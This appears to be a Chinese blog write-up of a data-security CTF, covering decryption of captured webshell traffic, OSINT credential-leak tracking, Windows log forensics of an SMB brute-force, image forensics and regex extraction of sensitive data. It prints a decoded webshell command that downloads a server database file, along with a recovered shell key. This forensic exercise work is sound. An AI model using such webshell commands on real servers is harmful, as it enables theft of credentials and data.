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

解密后关键代码:

$mode="ZG93bmxvYWQ=";$mode=base64_decode($mode);$path="L3Zhci93d3cvaHRtbC9pbmNsdWRlcy9yZWFsX2RiLnBocA==";

再base64编码:

$mode="download";$mode=base64_decode($mode);$path="/var/www/html/includes/real_db.php";

我们查看返回,发现返回包并不能通过aes解密,而后直接使用base64编码转换,这里字数太多,贴不上去了,刚刚直接崩溃了,不知道这算不算公众号的bug,特么的又重写了一遍

先进行base64编码

在进行16进制转换即可

第三题和第四题没做出来,直接出第五题了

这个地方我没解开,队友解开了

通过获取的shell.php的密钥 05c1cc9c2deafb75 利用脚本解密第203个分组包,获得一串base64编码的字符串

0x03 账号泄密追踪

题干如下

第一个小题,是从github搜索

搜索green berry,定位源码类型为python的工程

翻阅文件,查找到key

第二小题,gitee

Gitee平台为国内平台,先尝试拼音

翻阅文件,检索key

第三小题

语雀为国内平台,优先检索拼音,限定时间半年内

第四小题

知乎搜索qingmei

第五小题

0x04 BlueTeam

第一题,题干给的是一些系统日志、监控的进程信息以及一个流量包

我们打开系统安全日志,通过检索4624/4625登录事件发现,ming用户的爆破时间点与登录事件点一一对应,可以确定,是ming用户异常

首先检索登录失败日志,将事件限制在6.27即可

我们不难发现,在21:21这个时间段内明显存在暴力破解现象,攻击者利用SMB协议进行暴力破解攻击,并且于21:21:32爆破最后一次并成功停止爆破

我们再查看对应的登录成功日志,发现ming用户的确是21:21:32登录成功

第二题没答上来,试了一下第一次登录成功的ip地址,也试了第一次攻击的ip地址,都失败了,也就没浪费太多时间

第三题

我们使用ProcessMonitor工具打开题干给的Logfile.PML文件

通过浏览进程信息,此处开始查询权限,判断在此时间点前进行了提权

向上找垃圾,发现疑似使用word文件进行提权(猜测缓冲区溢出漏洞)

往前翻发现下载了很多的文件helper.doc

最后这道题就这么写了,我也没找到为什么是这个文件进行溢出提权

第四题

非常规软件对各类办公文件进行检索,判断为最终提权后文件

第五小题

承上启下

0x05 sneakshot

下载好之后,是一张图片,并且是iphone14拍摄的

最后用了ps也没行,能看出来有个水印,于是乎回头用手机打开,调节参数信息,例如亮度、对比度、柔和度等,终于挑出来,能看了

最后是重磅戏,属于数据治理了

0x06 敏感数据识别

我们先看题干

打开试题,是一个80+MB的txt文件,我们需要提取我们所需要的信息

此时我们除了写脚本,并没有太好的办法,这里以队长老王的脚本为例,为啥不用我的,因为我写的没人家写的规范

此处以python脚本为例

根据手机号、imei、银行卡限制要求,制定匹配list

IP匹配

邮箱匹配

手机号匹配

Imei匹配

银行卡号匹配

读取文件匹配即可,就不演示了

剩下的题也没来得及做,简单web题第一题只能做出来一半,就不写了;
第二题其实是github上的源码,通过更改setcookie即可达到越权的效果,但是并没做出来,菜是原罪

 https://github.com/PanJiaChen/vue-element-admin/issues/587

其实还想做刮刮乐那道题的,但是最后实在是头疼,三个好兄弟一商量,在五点结束了继续做题的想法

还是有收获的

写在后面:

公众号回复关键字

数据大赛

即可获取题目信息

    本公众号发布的靶场、文章项目中涉及的任何脚本工具,仅用于测试和学习研究,禁止用于商业用途不能保证其合法性,准确性,完整性和有效性,请根据情况自行判断;

     本文章、项目内场所有资源文件,杜绝任何靶本公众号、自媒体进行形式的擅自转载、发布

    本公众号对任何脚本及工具问题概不负责,包括不限于由任何脚本错误导致的任何损失或损害及任何法律责任;

    直接使用本或公众发布的技术、靶场、文章项目中涉及的脚本工具,但在某些行为不符合任何国家/地区或相关地区的情况下进行传播时,引发的隐私或其他任何法律问题的后果概不负责;

    如果任何单位或个人认为项目或文章的内容可能侵犯其权利,则应及时通知并证明其身份,证明我们将在收到证明文件后删除相关内容;

    以任何方式查看或使用此项目的人或直接或间接使用项目的任何脚本的使用者都应仔细阅读此声明;

     本公众号保留更改或补充,免责随时声明的权利;

    一旦您访问或使用访问本公众号任何项目,则视为您已接受此免责声明。

     您在本声明未发出之时,使用或者访问了本公众号任何项目 ,则视为已接受此声明,请仔细阅读。

                                                                                         此致

    由于、利用的信息而造成的任何或直接的此文传播后果,均由用户本人负责,作者不承担任何直接责任。

一切法律后果均由攻击者承担!!!

日站不规范,亲人两行泪!!!

日站不规范,亲人两行泪!!!

日站不规范,亲人两行泪!!!

专注于信息安全方面分享,非营利性组织,不接任何商业广告

关注不迷,点赞!关注!转向!评论!!

要投稿的请留言或者加微信,会第一时间回复,谢谢


文章来源: http://mp.weixin.qq.com/s?__biz=Mzg2MzYzNjEyMg==&mid=2247486509&idx=1&sn=a56183936bd36da0b37a4cdb48d39a82&chksm=ce74d3d8f9035ace0ca6a46f0afadc845deebbae8ccb1b49e2b0c1eee7d2be28001c5afb7a42#rd
如有侵权请联系:admin#unsafe.sh